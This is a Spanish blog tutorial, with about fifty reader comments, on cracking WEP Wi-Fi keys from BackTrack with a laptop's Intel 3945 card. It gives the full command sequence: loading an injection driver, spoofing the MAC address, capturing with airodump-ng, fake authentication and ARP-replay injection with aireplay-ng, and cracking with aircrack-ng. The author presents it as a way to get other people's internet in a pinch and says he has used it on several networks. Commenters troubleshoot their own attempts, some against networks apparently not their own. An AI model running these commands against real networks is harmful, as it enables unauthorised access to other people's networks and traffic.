Limitless

Rompiendo WEP con la tarjeta Intel 3945

Uno de mis primeros post (para ser exacto el séptimo) fue el mostrar cómo Romper claves WEP, y comenzaron a preguntarme si era necesaria otra tarjeta para poder hacer el procedimiento, a lo cual para mi desconocimiento amplio en esos momento sobre el tema era que si, era completamente necesaria otra tarjeta inalámbrica compatible con la distribución de Linux Backtrack para poder vulnerar la clave de seguridad WEP, que la mayoría de los usuarios promedio usan en sus routers, ya sea porque viene por default o no conocen otras opciones para proteger el acceso a sus redes inalámbricas.

En esta semana requería forzosamente segunda red con internet porque a la red que estaba conectado estaba MUY lenta, y me volvió a entrar la duda de cómo obtener la clave si no traía mi tarjeta inalámbrica externa, después de 2 horas de ardua lectura de la documentación del Backtrack y unos cuántos blogs, encontré la manera de aplicar un método INFALIBLE a pesar de poca señal inclusive, y lo mejor de todo… con la tarjeta que la mayoría de las portátiles trae… la Intel 3945abg.

Lo que necesitamos es:

  1. Distribución de Linux Backtrack.
  2. Un equipo con tarjeta Intel 3945 (que a partir de cierto paso es igual para casi todas las demás tarjetas sólo que sean capaces de inyectar paquetes)

Teniendo esto comenzamos booteando nuestro equipo con la distribución de Backtrack y elegimos la opción de gráficos KDE.

Romper WEP 00

UPDATE: Al momento de escribir código (no los números) pueden ir pulsando la tecla TAB (tabulador, la de las flechas en ambas direcciones) para que les complete los comandos y no suframos escribiendo estríctamente todo el código letra por letra y nos equivoquemos en el camino, sólo es necesario pulsar las letras iniciales y pulsar TAB para que complete el código.

Enseguida podremos verificar si tenemos una tarjeta Intel 3945abg con el siguiente comando:

lspci | grep Netowrk

Mostrándonos que efectivamente tenemos esa tarjeta

0c:00.0 Network controller: Intel Corporation PRO/Wireless 3945ABG Network Connection (rev02)

Lo que haremos es cambiar el modo de uso de la Intel 3945abg para poder monitorear e inyectar paquetes con estos comandos:

rmmod iwl3945
modprobe ipwraw

Romper WEP 01

A partir de este paso, las instrucciones son las mismas para la mayoría del resto de las tarjetas.

Una vez hecho esto escribimos este comando para ver cómo es que la distribución llama a nuestra tarjeta, que será la que NO nos marque “no wireless extensions“, que en mi caso le llama wifi0:

iwconfig

Esta tarjeta la camuflajearemos cambiando su MAC, para ello la deshabilitaremos, cambiamos y volvemos a habilitar:

airmon-ng stop wifi down
ifconfig wifi0 down
macchanger –mac 00:11:22:33:44:55 wifi0

airmon-ng start wifi0

Ahora exploraremos todas las redes disponibles que alcance a detectar nuestra tarjeta con:

airodump-ng wifi0

Romper WEP 02

Ya exploradas todas las redes, pulsamos Control+C y elegimos la red a vulnerar, y copiamos su MAC o BSSID, ya que la necesitaremos en varias ocasiones más adelante, aparte de ello iniciamos con el proceso de inyección de paquetes para romper su seguridad con este código:

airodump-ng -c (canal de transmisión, columna CH) -w (nombre del archivo de captura) –bssid (MAC del router de red destino que copiamos) wifi0

Lo que para mi ejemplo quedó así:

airodump-ng -c 3 -w jafrancov –bssid 00:21:7C:D0:71:89 wifi0

Romper WEP 03

Abrimos una nueva ventana y nuestra siguiente instrucción hará una Autenticación/Asociación con el Router, si esta es correcta nos regresará una carita feliz como esta –> : – )

aireplay-ng -1 0 -a (MAC del router de la red destino que copiamos) -h 00:11:22:33:44:55 wifi0

Para mi ejemplo:

aireplay-ng -1 0 -a 00:21:7C:D0:71:89 -h 00:11:22:33:44:55 wifi0

Seguido y si es bien logrado colocamos el siguiente código para la inyección de paquetes, dado ” enter” nos preguntará si deseamos usar el paquete que nos muestra, presionamos la tecla ‘Y’ y damos enter, para que inicie el proceso:

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (MAC del router de red destino) -h 00:11:22:33:44:55 wifi0

Para mi ejemplo:

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:21:7C:D0:71:89 -h 00:11:22:33:44:55 wifi0

Romper WEP 04

Hecho todo lo anterior sólo nos resta esperar un poco a que el valor de la columna “#Data” comience a aumentar, pasados los 10,000 datos intercambiados abrimos una nueva ventana de consola y escribimos:

aircrack-ng (Nombre que dieron al archivo de captura)-01.cap

Nueva y por última vez para mi ejemplo:

aircrack-ng jafrancov-01.cap

Automáticamente nos llevará a una pantalla donde prueba todas las posibles claves, si los datos de los paquetes inyectados no arrojaran una clave válida, nos indicará que intentemos pasados cada 5,000 IVs, que es lo mismo que el número de la columna ‘#Data’, pasados los 160,000 es 100% probable que obtengamos una clave WEP común de 64 bits hexadecimal, en lo personal he visto una tendencia de usuarios a usar sólo números, así que a partir de los 10,000 IVs es bueno comenzar a probar, cuando sea descubierta la clave nos lanzará un texto que dice “KEY FOUND! [Clave]”, ese número es la clave WEP que nos pide el router al intentar conectarnos.

Romper WEP 06

Este método lo usé ya con varias redes incluyendo de las de menor señal y aún así se pudo obtener la clave y libre acceso a internet y la red local del router como se puede ver en la imagen:

Romper WEP 08

No me queda más que recomendar cambiar de protocolo de seguridad a WPA por ejemplo, que hasta el momento es de los más seguros para redes inalámbricas, disfruten el post y puede ser una buena opción cuando se requiere de urgencia tener internet… je

Enjoy this Life!!

About Author

Alex Franco

 Developer, Sysadmin, traveler, music lover, #TqV, SU2 at #4sq, and more…

162 Comments

  1. Alejandra Reply

    Wow sin duda muy buena aportación, de hecho pense ke no se podía :s

  2. 4narqu1sta 2uper3strella Reply

    Mirá que…

    Yo lo hacía con la distribución de Slax, pero conforme leí tu post, se me hizo más sencillo como tu lo planteas…

    La cuestión es que las últimas distribuciones de Slax traen soporte para varias tarjetas, sobre todo Ralink y de marcas económicas como Encore que traen la Realtek.

    Buen aporte, habrá que probar ésta distribución.

    Saludos!!

    Cheers…

  3. Erick Romero Reply

    Disculpa tengo una tarjeta nVidia nForce 430 para esas no ahi nada que hacer ? gracias

  4. JA Franco Reply

    @Erick Romero, si, si se puede, la manera en que para tu tarjeta funcionará es a partir del paso donde escribes por primera vez el comando iwconfig de ahí en delante es todo completamente igual para la mayoría de las demás tarjetas…

    Saludos…

  5. Paul Reply

    ¿Funciona con cualquier versión de Back|Track?
    ¿Funciona corriendo desde una máquina virtual?

    Saludos.

  6. JA Franco Reply

    @Paul Con la versión 3 o 4 funciona, supongo que las que salgan posteriores igual lo hará, ahora con máquina virtual funcionará con una tarjeta externa ya que no puede detectar como tal la tarjeta inalámbrica intel 3945, pero de una forma o de otra funciona =D

    Saludos…

  7. Luis Reply

    Hola, como le haces para introducir esa contraseña tipo XX:XX:XX:XX:XX en windows?

  8. JA Franco Reply

    @Luis No es necesario introducir los dos puntos, pon la clave que obtiene directamente sin los dos puntos por ejemplo, si la clave te salió 11:aa:22:bb:33 en windows o cualquier otro sistema operativo sólo introduces 11aa22bb33cc y es todo, así te conectará…

    Saludos…

  9. Anonymous Reply

    amigo yo tengo una targeta intel4965a/b/g puedo utlizar esa targeta con el backtrack o no espero tu respuesta quisiera comprobar la seguridad de mi red
    mi correo es karxcamaleon@gmail.com

  10. pzicho Reply

    buen tutorial… solo que no puedo inyectar trafico, utilizo la tarjeta Intel 3945

    espero tu respuesta!

  11. JA Franco Reply

    @Anónimo Mira según lo que leí si se puede hacer con la tarjeta intel 4965, en la parte donde puse el código de "rmmod iwl3945" pon "rmmod iwl4965" no tengo manera de probarlo pero puedes intentar, en algunos otros casos he visto que aplican "modprobe -r iwl4965" y después todo el código que yo pongo ("modprobe ipwraw" … etc) aunque esta última tienen a veces broncas, yo te recomiendo lo primero, según la documentación es lo más viable.

    Grx por el comment, Saludos…

  12. JA Franco Reply

    @pzicho Te logró hacer la autenticación con el router?? o en que parte es donde no puedes avanzar??

    Saludos…

  13. Carlos Reply

    Saludos, si son principiantes como yo les recomiendo el WIFISLAX 3.1 esta en español y esta basado en back track pero todo se hace desde el menu de inicio.
    1. WifiSlax – Asistencia chipset- Asistencia intel pro wireless – cargar ipw3945 inyección.

    2. Wifislax – Herramientas Wireless – Airoway y nos abre cinco ventanas en shell, pero en la ventana que dice "Airoway_Command_[CTRL][C]" la seleccionas y presionas las flechas (izq y derecha)para cambiar de canal (tipicamente en el 6 está el Infinitum) ya que viste la red presionas ENTER y la seleccionas de un listado que te aparece.

    3. Despues presionas 2 que es la opción de asociar un cliente. (debe aparecer algo como Authentication succesful)

    4. Después seleccionas 3 que es replay ARPs (aqui se hace la inyección de paquetes)

    5. Esperas de 5 a 30 min. (depende de la distancia al router) y presionas 8 que es Crack

    Voila!!!!

    Y recuerden esto es para que prueben la seguridad de sus redes no para consumir el ancho de banda de tus vecinos. Por esta razón yo recomiendo que cambien la contraseña de su router a una tipo WPA y que esta no sea sencilla de recordar como por ej. familiaHdez es una contraseña pesima.(en computadoras con XP SP1 o menos creo que necesitas drivers especiales para usar seguridad WPA)

  14. Ramses Reply

    Al escribir aircrack-ng jafrancov.cap

    me dice que el archivo no existe

    igualmente pude abrir otro archivo que da en el proceso de "aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (MAC del router de red destino) -h 00:11:22:33:44:55 wifi0" al escribir la "Y"

    pasaron 30 minutos y no encontro la clave WEP, hice todos los pasos que escribes en tu blog pero no funciono, no se si fue la poca señal de la red?

    Saludos.

  15. JA Franco Reply

    @Ramses, Una disculpa hice un update, es conforme al nobre que le hayas dado en el paso donde escribiste airodump-ng, pero olvide al final agregar un -01 para quedar así: 'nombrearchivo-01.cap' con eso debe funcionar, y con este método no importa la distancia ya que se amplifica al máximo la potencia de la tarjeta de red, espero te funcione, cualquier cosa, aquí andamos.

    Saludos…

  16. Yoshimar Reply

    El manual mas sencillo que haya visto.

    Yo igual tuve el problema con el nombre del archivo, (lo solucione buscándolo :P) gracias por el update y el tip de Tab.

    Mas fácil no se puede, gracias :)

  17. pzicho Reply

    Buen Dia! ya pude crackear mi propia red con WAP!! nada mas una pregunta, tambien es posible hacerlo con una WPA???

    al tratar de hacerlo me aparece lo siguiente en el paso de "aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (MAC del router de red destino) -h 00:11:22:33:44:55 wifi0
    "

    Sending Autheticatiopn request (open system) [ACK]
    Authentication Successful
    Sending Assosiation Request
    Denied (code 12), wrong ESSID or WPA??

    te agradeceria tu respuesta, ya que soy nuevo en esto del LINUX XD

    saludos

  18. JA Franco Reply

    @Yoshimar Mil gracias, y si vaya!! disculpen el error del nombre del archivo. Gracias por el comentario…

    Saludos…

  19. JA Franco Reply

    @pzicho imagino la que pudiste romper es la que tiene WEP, y estoy investigando cómo romper una WPA y WPA2, ya que no es el mismo proceso, en corto estaré publicándoles si es que resultó efectivo el método.

    Saludos…

  20. Ramses Reply

    Gracias JA Franco al final ya pude hackear la clave wep, muy buen tutorial para los que tenemos esa tarjeta de red en la laptop.

    Saludos.

  21. Anonymous Reply

    Hola JA Franco

    necesitas instalar el Backtrack. o es un LiveCD

  22. Anonymous Reply

    como lo hago con una tarjeta Realtek RTL8187B Y WIFISLAX

  23. Anonymous Reply

    No ps que chido que se pueda hacer esto. una pregunta, yo se muuuuuuy poco de computadoras, por lo que hacer esto a pesar de que debe ser muy facil por que todos lo dicen, para mi no lo es jejeje, pero bueno el caso es que no he podido empezar por que no se como bajar el backtrack. Para correr el Backtrack necesito algo en mi computadora, tengo windows xp.

    Que hag0? ayudenme porfa?
    Soy demasiado nuevo en esto

  24. Carlos Reply

    Anónimo En WifiSlax 3.1 el chipset RTL8187 si está soportado pero la revisión B no.

  25. pzicho Reply

    @Anonimo… no ocupas saber mucho aqui descargas directamente el archivo a quemarse en un CD o DVD http://is.gd/2fF9n
    despues de quemarlo reinicias tu computadora aparecera una pantalla con la marca del fabricante de tu equipo (mejor conocido como BIOS) y ahi debe decir algo sobre BOOT MENU y presionas dicha tecla (para mi es F12 y de ahi en adelante sigues los pasos mencionados aqui en el tutorial.

    a mi me costo un poco de trabajo porque mi tarjeta no iniciaba de un principio, al parecer despues de 1 o 2 minutos encendia, me daba cuanta por que no me lo indicaba el LED del Wi-Fi… espero te sirva de algo!

  26. Anonymous Reply

    hola tengo una laptop con tarjeta integrada intel 4965 agn cuando escribo el primer comando para poder inyectar paquetes no me da me dice q el modulo no existe escribi rmmod iwl4965 pero no me funciono, luego use modprobe -r iwl4965 y no mando mensaje pero luego use modprobe ipwraw y me salio q no se encontro el modulo no se si algo este mal o como le hago para saber si voy bien.

    grax por el tuto y saludos

  27. Bernardo Reply

    Excelente post, pero me salian errore, asi que leyendo los comentarios decidi bajarme el que cpmenta carlos WIFISLAX 3.1 y super pero en el paso donde debo presionar 8 para que cracquee el password me sale un mensaje en la ventana airoway_attack donde se debe especificar un diccionario (option -w)

    Opening airo

  28. Carlos Reply

    Bernardo, los diccionarios se usan cuando estas tratando de romper redes tipo WPA el ejemplo de JA Franco es para redes WEP. Existen varios diccionarios disponibles (pero son de paga) y no existe ninguna certeza que se pueda obtener la clave, por eso recomiendo usar seguridad WPA con una clave dificil de adivinar

  29. Bernardo C. Reply

    Carlos, enotnces debo entender qe la seguridad de la red inalambrica que deseo verificar tiene seguridad WPA y no WEP.

    si pruebo con mi cuenta y le coloco wep si me sacaria el password o me lo visualizaria en esa ventana.

  30. JA Franco Reply

    Bernardo, así es efectivamente, a la hora de que haces el airodump-ng te dice que tipo de encriptación está usando si WEP o WPA (imagen) en la columna ENC, y como te comenta Carlos, para romper una red WPA si hay posibilidades pero necesitas contar con un diccionario de datos extremamente bien elaborado y claro… eso cuesta y aún así no te garantiza poder vulnerar la red.

    Saludos…

  31. Fran Reply

    Hola JAFranco;

    cuando ejecuto el comando “modprobe ipwraw” me dice que no puede encontrar el modulo especificado (ipwraw)
    aun asi ejecuto iwconfig y no aparece nada de wifi0 ni similares por ningun sitio.
    Un cable?

  32. Fran Reply

    Hola de nuevo.

    Asi es, con ese comando me sale exactamente lo que tu has puesto. incluso la rev. jeje
    Ok, lo intento con la version 3, tal como dices tu tengo la 4 y al ser beta …

    Muchas gracias por el apunte. Te mantengo informado!

  33. Luna Reply

    Muy interesante post, sin embargo me queda esta duda, cuando dices que se va a cambiar el modo de uso de la Intel 3945abg para poder monitorear e inyectar paquetes con los comandos, solamente se cambia este uso mientras este cargado el linux?

    saludos y gracias!!

  34. Jorge Reply

    Hola Alex lo he hecho todo y me a salido menos hasta el paso en el que hay que poner esto:
    aireplay-ng -1 0 -a (MAC del router de la red destino que copiamos) -h 00:11:22:33:44:55 wifi0

    Luego tu dices que saldra algo y hay que poner “Y”. A mi solo me pone “read -el numero de paquetes que va subiendo- packets- pero nada mas y suben los paquetes. Que puede pasar?. Gracias de antemano

  35. Alex Franco Reply

    @Jorge, la función de la línea que estás poniendo hace la autenticación con el router, y te pone la carita feliz “: – )”, en esa parte no debe inyectar paquetes aún, lo que va a hacer es mostrar unas líneas que dicen:
    Sending Authentication Request ( Open System ACK)
    Authentication successful
    Sending Association Request [ACK]
    Associationsuccesful : – ) (AID: 1)

    Puedes checar esta imagen para que te des una idea http://www.flickr.com/photos/jafrancov/3750032960/

  36. Alex Franco Reply

    @Jorge, la función de la línea que estás poniendo hace la autenticación con el router, y te pone la carita feliz “: – )”, en esa parte no debe inyectar paquetes aún, lo que va a hacer es mostrar unas líneas que dicen:
    Sending Authentication Request ( Open System ACK)
    Authentication successful
    Sending Association Request [ACK]
    Associationsuccesful : – ) (AID: 1)

    Puedes checar esta imagen para que te des una idea http://www.flickr.com/photos/jafrancov/3750032960/

  37. gian carlo Reply

    hola a mi me sucede lo mismo k a jorge me sale la carita y todo
    Sending Authentication Request ( Open System ACK)
    Authentication successful
    Sending Association Request [ACK]
    Associationsuccesful : – ) (AID: 1)
    hasta ese punto llego pero de ahi ingreso
    aireplay’ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b(mac devictima) -h (mi mac)wifi0

    al terminar d escribir este comando deberia salirme como dics una confirmacion para inyectar la cual nunca me sale espero y espero pero lo unico que sale es :reaa(xxxetc)pakets o etc
    y en ningun momento sube el # de datos probe haciendo lo mismo en la casa d mi primo y si me dio resultados pero ahora k intento en mi casa se keda ahi a k se dbe podrias ayudarme porfavor

  38. Alex Franco Reply

    @Gian Carlo, @Jorge
    Ahmmm Creo que es extraño que pase eso, ¿¿creen que puedan hacer una captura de pantalla y subirla a algún lado para ver qué es lo que marca y poder auxiliarlos??

    Saludos…

  39. Alex Franco Reply

    @Gian Carlo, @Jorge
    Ahmmm Creo que es extraño que pase eso, ¿¿creen que puedan hacer una captura de pantalla y subirla a algún lado para ver qué es lo que marca y poder auxiliarlos??

    Saludos…

  40. Jorge Reply

    OK, le hare una foto y te la subire. Saludos

  41. gian carlo Reply

    no se mucho de programas com puedo capturar una imagen en el backtrack??? y como la subo tengo k poner en algun sitio especial?? estare intentando pero t agradeceria una mano

  42. gian carlo Reply

    ya tengo las imagenes como hago para subirlas aki???? o te las envio a un correo??? porfavor ayudame???

  43. gian carlo Reply

    mejor asi dale click son 3 imagenes para k masomenos t des cuenta donde se traba, me acepta la asociacion y aparesco abajo como si estuviera usando paketes pero la data no sube nada y cuando ingreso los comandos para inyectar se keda en ;; read(xxxx) asi kl porfa ayudame las imagenes estan aki abajo

    http://rapidshare.com/files/276897094/misfotos.zip.html

  44. esta en zip son 3 imagenes k tienes k descargar estare esperando tu apoyo gracias d antemano

    http://rapidshare.com/files/276897094/misfotos.zip.html

  45. Jorge Reply

    Eso es lo mis mismo que me pasa a mi, pone read (xxx) packets pero no hace nada mas que subir el numero de paquetes. Espero la ayuda.

    P.D: Gracias Gian Carlo por subir las fotos

  46. @Jorge @gian carlo, Disculpen la tardanza pero estaba leyendo cual pudiera ser el problema, quizá la única respuesta a que no termina de generar el paquete de ataque es que no haya conectado alguien al router, ya que algunos modelos tienen ese bache de seguridad extra, ¿cómo saber si hay alguien conectado?, sencillo, a la hora de hacer el “airodump -c 6 -w nombre….. etc.” en la parte inferior deben aparecer unos títulos semejantes a los de arriba, pero estos dicen BSSID, STATION, etc., debajo de ellos en primer lugar debe aparecer la MAC del router que es la misma de arriba y debajo de ‘station’ alguna MAC diferente de la que camuflajeamos nuestra tarjeta de red, es decir, diferente de 00:11:22:33:44:55, esto nos indica que hay alguien conectado, prueben de esta manera y espero les funcione, cualquier cosa, aquí andamos…

    Saludos…

  47. @Jorge @gian carlo, Disculpen la tardanza pero estaba leyendo cual pudiera ser el problema, quizá la única respuesta a que no termina de generar el paquete de ataque es que no haya conectado alguien al router, ya que algunos modelos tienen ese bache de seguridad extra, ¿cómo saber si hay alguien conectado?, sencillo, a la hora de hacer el “airodump -c 6 -w nombre….. etc.” en la parte inferior deben aparecer unos títulos semejantes a los de arriba, pero estos dicen BSSID, STATION, etc., debajo de ellos en primer lugar debe aparecer la MAC del router que es la misma de arriba y debajo de ‘station’ alguna MAC diferente de la que camuflajeamos nuestra tarjeta de red, es decir, diferente de 00:11:22:33:44:55, esto nos indica que hay alguien conectado, prueben de esta manera y espero les funcione, cualquier cosa, aquí andamos…

    Saludos…

  48. gian carlo Reply

    pucha gracias pero aun no logro hacer de la conexion, lo intente en otros lugares (casa de parientes cosas asi) ahi si pude hacer la inyecion de paketes y encontrar la clave pero ahi no era nesesario que aya alguien mas conectado,podria ser que este muy lejos de la conexion????? por eso no sube ni el data ni los paketes???? pork ya intente y nada gracias de todos modos si logre hacerlo pero no donde deseaba por eso keria tu ayuda si supieras alguna otra forma te lo agradeceria saludos desde Cusco-Peru

  49. gian carlo Reply

    a me olvidaba esto si debes saber para navegar desde el backtrack osea conectarme luego de sacar la clave para provar la conexion un dia vi k un amigo lo hacia pero noc como lo hizo pero estaba navegando desde el firefox del backtrack ayudame en eso mas si porfavor gracias de nuevo

  50. Una consulta … al bootear el Backtrack, me pide el root.

    Eso después de escoger la resolución. en la primera pantalla. Luego comienza a cargar y queda consultandome algo que no se.

    Tiene alguna contraseña o algún pass para llegar a la primera pantalla que aparece en tu tutorial???

Comenta